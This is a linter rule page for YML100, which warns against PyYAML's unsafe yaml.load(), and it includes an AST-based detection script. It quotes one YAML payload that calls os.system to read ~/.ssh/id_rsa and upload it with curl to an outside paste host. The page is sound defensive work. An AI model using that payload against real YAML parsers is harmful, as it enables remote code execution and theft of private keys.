# YML100

Use of unsafe yaml load. Allows instantiation of arbitrary objects. Consider yaml.safe_load().

The PyYAML library's default loader will parse YAML like this:

```yaml
!!python/object/apply:os.system ["cat ~/.ssh/id_rsa | curl -F 'sprunge=<-' http://sprunge.us"]
```

Using `yaml.load` against this input would execute local commands on the host shell.

## Deprecation in PyYAML 5.1

Newer versions of PyYAML (5.1) will raise a warning; however, in many situations, such as web servers, developers would not see this warning.

## Example

```python
import yaml

# Flagged by YML100: yaml.load() called without a safe Loader
with open('cfg.yaml') as cfg:
    config = yaml.load(cfg)
```

## Quick Fixes

* The plugin will recommend [Safe Load Fixer](../fixes/safeloadfixer.md).

## See Also

* [YAML Load Input Documentation](https://github.com/yaml/pyyaml/wiki/PyYAML-yaml.load(input)-Deprecation)
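
A minimal static check for the `yaml.load` pattern that YML100 describes, written with Python's standard `ast` module so it can run in CI without the IDE. It is an added example, not the plugin's own implementation: `find_unsafe_yaml_load`, `SAFE_LOADERS` and the sample source are hypothetical names, and treating only `SafeLoader` and `CSafeLoader` as safe is this example's assumption.

```python
import ast

SAFE_LOADERS = {"SafeLoader", "CSafeLoader"}  # policy chosen for this example

def find_unsafe_yaml_load(source):
    """Return sorted line numbers of yaml.load() calls lacking a safe Loader."""
    tree = ast.parse(source)
    modules, funcs = set(), set()  # local names bound to yaml / yaml.load
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            modules |= {a.asname or a.name for a in node.names if a.name == "yaml"}
        elif isinstance(node, ast.ImportFrom) and node.module == "yaml":
            funcs |= {a.asname or a.name for a in node.names if a.name == "load"}
    findings = []
    for node in (n for n in ast.walk(tree) if isinstance(n, ast.Call)):
        f = node.func
        via_module = (isinstance(f, ast.Attribute) and f.attr == "load"
                      and isinstance(f.value, ast.Name) and f.value.id in modules)
        via_name = isinstance(f, ast.Name) and f.id in funcs
        if not (via_module or via_name):
            continue
        # Loader is the second positional argument or the Loader= keyword.
        loader = node.args[1] if len(node.args) > 1 else None
        for kw in node.keywords:
            if kw.arg == "Loader":
                loader = kw.value
        # yaml.SafeLoader is an Attribute node, a bare SafeLoader is a Name node.
        name = getattr(loader, "attr", None) or getattr(loader, "id", None)
        if name not in SAFE_LOADERS:
            findings.append(node.lineno)
    return sorted(findings)

# Constructed sample input; it is only parsed, never executed.
SAMPLE = '''\
import yaml
import yaml as y
from yaml import load
with open("cfg.yaml") as cfg:
    a = yaml.load(cfg)
    b = y.load(cfg, Loader=y.FullLoader)
    c = yaml.load(cfg, Loader=yaml.SafeLoader)
    d = yaml.safe_load(cfg)
    e = load(cfg)
'''

if __name__ == "__main__":
    for lineno in find_unsafe_yaml_load(SAMPLE):
        print(f"line {lineno}: yaml.load() without a safe Loader (YML100)")
```

The check resolves `import yaml as ...` and `from yaml import load` aliases but does not follow reassignment or dynamic attribute access, so treat it as a first-pass filter rather than a complete analysis.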